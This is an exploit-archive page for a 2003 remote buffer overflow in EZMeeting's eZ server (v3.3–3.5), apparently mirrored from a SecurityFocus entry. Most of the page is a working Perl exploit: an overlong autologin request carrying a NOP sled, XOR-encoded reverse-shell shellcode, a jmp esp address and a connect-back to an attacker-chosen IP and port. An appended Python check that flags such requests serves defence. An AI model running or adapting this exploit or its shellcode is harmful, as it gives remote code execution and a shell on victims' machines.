EZMeeting 3.x – ‘EZNet.exe’ Long HTTP Request Remote Buffer Overflow
Vulnerability ID | 1054285 | Vulnerability type | |
Published | 2003-12-08 | Updated | 2003-12-08 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Windows | CVSS score | N/A |
| Vulnerability details
Vulnerability details have not been disclosed.
| Vulnerability EXP
//source: http://www.securityfocus.com/bid/9167/info
//
//A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host.
#!/usr/bin/perl -w
######################C###O###R###O###M###P###U###T###E###R######################
# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt]               #
#-------------------------------------------------------------------------------#
# versions tested & not vulnerable: v3.0 v3.1 v3.2                              #
# versions tested & vulnerable: v3.3 v3.4 v3.5                                  #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5   #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to      #
# finally reach the shellcode. The shellcode gives a reverse remote shell.      #
# Universal shellcode coded by kralor with the PEB technique.                   #
######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T######
use IO::Socket;   # also re-exports Socket's inet_aton() and sockaddr_in()
print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";
if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
exit;
}
print "[+] Connecting to ".$ARGV[0]."\t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}
print "Done\r\n";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ( $ - 4'608)
$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
# The payload is XOR-encoded with key 0x95; the short decoder at the start
# ("\x80\x33\x95" = xor byte [ebx],0x95) unmasks it at run time.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e".
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad".
"\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d".
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96".
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3".
"\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56".
"\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e".
"\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff".
"\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6".
"\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e".
"\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6".
"\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52".
"\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91".
"\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45".
"\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd".
"\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6".
"\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97";
$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
"\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a".
"\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c".
"\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0".
"\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8".
"\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39".
"\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52".
"\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e".
"\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a".
"\x45\x95";
# The connect-back port and address are masked with the same 0x95 key so
# they match the encoded payload they are spliced into.
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);
$paddr=substr($paddr,2,6);
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);
$request = "GET /SwEzModule.dll?operation=login&autologin=".
"\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
"\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";
print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;
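A defender-side check for the request shape this exploit produces, added here as an example (not part of the original advisory or exploit): it parses the HTTP request line, extracts the `autologin` parameter sent to `/SwEzModule.dll`, and flags an oversized value, a run of 0x90 bytes, or binary content. The thresholds and the sample requests are constructed assumptions, not values from the page.

```python
import re
from typing import List
from urllib.parse import parse_qsl

# Thresholds are assumptions for this example, not values from the advisory.
MAX_AUTOLOGIN_LEN = 256   # longest autologin value a legitimate client should send
MIN_NOP_RUN = 16          # a run of 0x90 bytes this long is treated as a NOP sled
NOP_RUN = re.compile("\x90{%d,}" % MIN_NOP_RUN)

# Constructed sample requests (not captured traffic): a benign login and one
# shaped like the request the exploit above builds (sled, code, long filler).
BENIGN = b"GET /SwEzModule.dll?operation=login&autologin=abc123 HTTP/1.0\r\n\r\n"
SUSPECT = (b"GET /SwEzModule.dll?operation=login&autologin="
           + b"\x90" * 100 + b"\xeb\x02\xeb\x0f" + b"\x90" * 4103
           + b" HTTP/1.0\r\n\r\n")


def inspect_request(raw: bytes) -> List[str]:
    """Return findings for one raw HTTP request; an empty list means clean."""
    request_line = raw.split(b"\r\n", 1)[0]
    # latin-1 maps every byte to one code point, so binary data survives decoding
    try:
        method, rest = request_line.decode("latin-1").split(" ", 1)
        target, version = rest.rsplit(" ", 1)
    except ValueError:
        return ["malformed request line"]
    path, _, query = target.partition("?")
    if path.lower() != "/swezmodule.dll":
        return []
    params = dict(parse_qsl(query, keep_blank_values=True))
    autologin = params.get("autologin", "")
    findings = []
    if len(autologin) > MAX_AUTOLOGIN_LEN:
        findings.append(f"autologin length {len(autologin)} exceeds {MAX_AUTOLOGIN_LEN}")
    if NOP_RUN.search(autologin):
        findings.append("run of 0x90 (NOP sled) inside autologin")
    binary = sum(1 for ch in autologin if not 0x20 <= ord(ch) < 0x7F)
    if binary:
        findings.append(f"{binary} non-printable bytes inside autologin")
    return findings


if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(inspect_request(sample) or "clean")
```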